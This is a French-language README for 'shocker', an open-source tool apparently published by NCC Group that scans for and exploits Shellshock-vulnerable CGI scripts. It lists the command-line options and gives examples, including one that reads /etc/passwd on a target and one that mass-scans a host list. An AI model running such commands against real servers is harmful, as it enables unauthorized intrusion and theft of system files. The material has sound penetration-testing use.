
Un outil pour trouver et exploiter des serveurs vulnérables à Shellshock
Un outil pour trouver et exploiter des serveurs vulnérables à Shellshock
Ref: https://en.wikipedia.org/wiki/Shellshock_(software_bug)
Publié en open source par NCC Group Plc - https://www.nccgroup.trust/
Développé par :
https://github.com/nccgroup/shocker
Distribué sous licence AGPL, voir LICENSE pour plus d'informations
utilisation : shocker.py
-h, --help affiche ce message d'aide et quitte
--Host HOST, -H HOST Un nom d'hôte ou une adresse IP cible
--file FILE, -f FILE Fichier contenant une liste de cibles
--port PORT, -p PORT Le numéro de port cible (par défaut=80)
--command COMMAND Commande à exécuter (par défaut=/bin/uname -a)
--cgi CGI, -c CGI Un seul CGI à vérifier (ex: /cgi-bin/test.cgi)
--proxy PROXY LÉGÈREMENT DÉFECTUEUX POUR L'INSTANT Proxy à utiliser sous la forme 'ip:port'
--ssl, -s Utiliser SSL (par défaut=False)
--threads THREADS, -t THREADS Nombre maximum de threads (par défaut=10, max=100)
--verbose, -v Être verbeux dans la sortie
./shocker.py -H 127.0.0.1 --command "/bin/cat /etc/passwd" -c /cgi-bin/test.cgi
Analyse http://127.0.0.1/cgi-bin/test.cgi et, si trouvé, tente d’afficher /etc/passwd
./shocker.py -H www.example.com -p 8001 -s
Analyse www.example.com sur le port 8001 via SSL pour tous les scripts de cgi_list et tente l'exploit par défaut pour tout script trouvé
./shocker.py -f ./hostlist
Analyse tous les hôtes listés dans le fichier ./hostlist avec les options par défaut
Python 2.7+
Modifications dans la version 1.1 (juin 2018)
Modifications dans la version 1.0 (mars 2016)
Modifications dans la version 0.72 (décembre 2014)
Modifications dans la version 0.71 (décembre 2014)
Modifications dans la version 0.7 (novembre 2014)
Modifications dans la version 0.6 (octobre 2014)
Modifications dans la version 0.5 (octobre 2014)
Modifications dans la version 0.4 (octobre 2014)
Avant 0.4 (octobre 2014)
Anthony Caulfield chez NCC pour le temps et l'effort consacrés à la révision des premières versions
Brendan Coles chez NCC pour son soutien et ses contributions